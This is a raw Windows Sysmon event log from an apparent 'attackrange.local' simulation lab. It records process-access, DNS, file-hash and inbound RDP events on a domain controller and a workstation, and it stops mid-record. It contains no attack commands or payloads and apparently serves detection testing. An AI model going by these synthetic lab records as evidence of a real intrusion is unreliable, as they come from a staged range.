10341000x80000000000000001057287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:44.318{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001057286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.277{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local61822- 354300x80000000000000001057285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.277{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64242- 354300x80000000000000001057284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.276{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62163- 354300x80000000000000001057283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.275{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50985- 354300x80000000000000001057282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.274{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55877- 354300x80000000000000001057281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.273{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65446- 354300x80000000000000001057280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.272{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55038- 354300x80000000000000001057279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.271{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50743- 354300x80000000000000001057278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.268{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64093- 354300x80000000000000001057277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.267{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local54213- 354300x80000000000000001057276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.265{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local56118- 23542300x8000000000000000981694Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:44.170{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA13E6445F80CAB60DDFBFC59F331D3,SHA256=A1977ADF3C861EFA330C2BC579F9CCBB474855741A9607225CD03D77A451623D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981697Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:42.332{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63894-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981696Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:45.185{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4397DD3334D2A3012060E09D00627CB,SHA256=0D062738CA8E1427928A054B1E6EDD53C6D322DD82DB05A8B1F51A091D225792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:45.037{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9787BF5B3615C34861051631D504DF30,SHA256=1C75B9F7EF80F10F5BFA691179C609DF84A844D8EC07197CB6F659CED9932419,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981695Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:45.029{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8F6B032A9EE4C451976069D43A84A87,SHA256=D5F01C2373A5C5EFB948BD5838D7537BC6B9EB7FF8D7FA62A6338155FDD93B07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981699Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:43.822{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59563-false10.0.1.12-8000- 23542300x8000000000000000981698Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:46.201{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307AFE23E357594EE0611000443CCEA2,SHA256=EF109B605DB950368FB062D63843B69F71DA86A30815BB28376B7FA69A9828F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:46.880{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:46.052{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC958360F8833A7EEC7496F5197277C,SHA256=EF2DD837E334A9CAD469FCF9565C5B273F6305F392488638D5E593534E50C7EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981700Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:47.201{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC4A772B9AF2D10B3D0B80ABA144E74E,SHA256=8C9B2C9C768EFFF9C6CAAB22050E3A2AC616E1F9E30E5CB42AF2E74A1CD130E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:47.099{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2B960D6D2DC2AAB0561E0AA8D237849,SHA256=4953A59290B1B22446EDB42780976E9C5E27DB1318D4D3685F22801299E3C9D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.912{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.912{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.912{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324844C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324844C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324844C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324844C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.896{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.880{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.880{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.880{5EBD8912-8E1C-6151-C900-00000000FD01}16725488C:\Windows\system32\conhost.exe{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.865{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8E1C-6151-C900-00000000FD01}1672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.849{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.834{5EBD8912-8D26-6151-8500-00000000FD01}27604704C:\Windows\system32\csrss.exe{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 